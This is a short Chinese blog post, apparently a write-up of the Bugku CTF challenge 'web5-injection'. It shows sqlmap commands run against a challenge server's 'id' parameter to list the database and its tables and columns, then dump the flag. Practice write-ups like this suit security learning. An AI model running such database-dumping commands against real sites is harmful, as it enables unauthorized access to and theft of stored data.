新版newbugku-web5-injection Writeup

SQL注入 枫少 1个月前 (03-21) 501次浏览 0个评论

打开网页,看到一个留言板

不知道为什么,看到flag这个字眼就特别兴奋。。。。。于是点进去看看

看到URL地址可能存在SQL注入:

http://47.95.208.167:10005/?mod=read&id=1

于是可爱的我打开sqlmap跑一下试试

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" --current-db


卧槽,竟然跑出来了,这题好弱。。。。那我们就找flag吧,爆表。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 --tables –batch


有一个名字叫flag的表,,,继续,爆字段。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag --columns –batch


只有一个flag的字段,,,那就爆数据吧。。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag -C flag --dump  --batch


得到flag。。。。。这题好弱。。


乐趣公园 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:新版newbugku-web5-injection Writeup
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址